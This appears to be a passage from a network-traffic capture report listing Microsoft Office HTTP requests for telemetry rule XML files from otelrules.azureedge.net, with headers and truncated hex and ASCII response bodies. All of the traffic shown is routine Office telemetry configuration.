2024-10-30 02:56:00 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
124192.168.2.55263213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:00 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
ETag: "0x8DC582BE89A8F82"
x-ms-request-id: 3cf1e449-401e-00a3-55d5-288b09000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-15b8d89586fvpb59307bn2rcac00000002ng000000003b57
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:00 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session IDSource IPSource PortDestination IPDestination Port
125192.168.2.55263313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:00 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE51CE7B3"
x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025600Z-16849878b78bcpfn2qf7sm6hsn000000091000000000ctge
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


Session IDSource IPSource PortDestination IPDestination Port
126192.168.2.55263413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:00 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCE9703A"
x-ms-request-id: 63860650-101e-00a2-42b4-279f2e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-16849878b78qf2gleqhwczd21s00000007kg00000000kps8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
127192.168.2.55263513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:01 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE584C214"
x-ms-request-id: c49cf7be-b01e-0002-3880-271b8f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-16849878b78bcpfn2qf7sm6hsn000000091000000000ctgh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
128192.168.2.55263613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:01 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1407
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE687B46A"
x-ms-request-id: 5278af64-001e-0034-3fad-26dd04000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-16849878b78fhxrnedubv5byks00000005qg00000000kbq2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session IDSource IPSource PortDestination IPDestination Port
129192.168.2.55263713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:01 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1370
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE62E0AB"
x-ms-request-id: 135a34dd-b01e-0098-371c-27cead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-r197bdfb6b4b4pw6nr8czsrctg000000083g00000000gdcp
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


Session IDSource IPSource PortDestination IPDestination Port
130192.168.2.55263813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:01 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE156D2EE"
x-ms-request-id: 28a40559-201e-0096-60e1-29ace6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-r197bdfb6b48pl4k4a912hk2g400000006q000000000982g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


Session IDSource IPSource PortDestination IPDestination Port
131192.168.2.55263913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:01 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:01 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:01 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
ETag: "0x8DC582BEDC8193E"
x-ms-request-id: e20e9adc-401e-0083-18ae-26075c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025601Z-16849878b78nx5sne3fztmu6xc00000008fg000000003b58
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
132192.168.2.55264013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:02 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:02 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:02 GMT
Content-Type: text/xml
Content-Length: 1406
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB16F27E"
x-ms-request-id: 903d302d-701e-0050-069c-276767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025602Z-15b8d89586fqj7k5h9gbd8vs9800000008q000000000312d
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:02 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session IDSource IPSource PortDestination IPDestination Port
133192.168.2.55264113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:02 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:02 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:02 GMT
Content-Type: text/xml
Content-Length: 1369
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
ETag: "0x8DC582BE32FE1A2"
x-ms-request-id: e176ca7a-701e-0097-7bca-26b8c1000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025602Z-r197bdfb6b47gqdjvmbpfaf2d000000002mg00000000cmfs
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:02 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


Session IDSource IPSource PortDestination IPDestination Port
134192.168.2.55264213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:02 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:02 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:02 GMT
Content-Type: text/xml
Content-Length: 1414
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE03B051D"
x-ms-request-id: 897ec3ad-201e-005d-0167-27afb3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025602Z-16849878b786fl7gm2qg4r5y7000000007ng00000000n6v6
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:02 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
